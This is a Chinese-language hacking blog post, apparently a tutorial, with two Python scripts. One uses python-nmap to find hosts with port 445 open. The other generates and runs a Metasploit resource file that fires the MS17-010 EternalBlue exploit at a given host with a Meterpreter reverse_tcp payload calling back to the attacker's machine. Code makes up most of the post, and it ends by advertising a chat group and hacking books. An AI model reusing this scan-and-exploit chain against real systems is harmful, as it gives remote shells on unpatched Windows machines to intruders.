起因:看各位大佬們寫的shellcode厲害的一匹,可惜自己沒學C和匯編
也看不懂shellcode,只能寫一個調用metasploit里的模塊進行攻擊了。
0x01
攻擊機:192.168.223.141 kali Linux 目標:192.168.3.5 windows
需要用到的模塊(這里我們寫兩個腳本,一個用於掃描IP段,看看那個IP開了445)
nmap模塊 os模塊 sys模塊 nmap模塊kail自帶坑的要死,完全沒有相關的函數。 手動卸載:pip uninstall nmap 安裝:pip insall nmap
0x02
代碼分析
sm445.py
nmap模塊詳解:https://pypi.python.org/pypi/python-nmap/0.6.1
import nmap import sys print '[+]nmap scanning...' def portscanner(sbg): nmscn=nmap.PortScanner()#實例化nmap.PortScanner對象 nmscn.scan(sbg,'445')#scan('目標IP','端口') for host in nmscn.all_hosts():#獲取掃描到的所有主機 if nmscn[host].has_tcp(445):#判斷主機上是否有445端口, state=nmscn[host]['tcp'][445]['state']#端口445 / TCP在主機打開 if state=="open":#如果端口開放 print '[*]The open 445 ip in:'+host#輸出開放端口的IP portscanner(sys.argv[1])
yhzl.py
import sys import os print 'Metasploit executing the ms-17-010 vulnerability attack'#這句話的意思是正在實施MS17010漏洞的攻擊 def sds(config): config=open('yhzl.rc','w')#首先我們來創建一個xxx.rc的文件 #把你要使用到的模塊和對應的參數寫入xxx.rc里去 config.write('use exploit/windows/smb/ms17_010_eternalblue'+"\n") config.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp'+"\n") config.write('set RHOST '+sys.argv[1]+"\n") config.write('set LHOST '+sys.argv[2]+"\n") config.write('exploit'+"\n") sds('') def main(): mg=os.system('msfconsole -r /root/yhzl.rc')#執行msfconsole -r 路徑/xxx.rc,就可以了 if __name__ == '__main__': main()
運行截圖這里就不放了,我怕電腦藍屏。視頻發到群里了,看攻擊過程的小伙伴
可以進群看聊天記錄。還有歡迎大家進入即刻安全技術交流群:307283889
推薦大家看基本python的書:
《python絕技 運用python成為頂級黑客》 python2x 版本
《python 黑帽子》 python 3x版本
看完實戰,或者構造一個思路去實現他。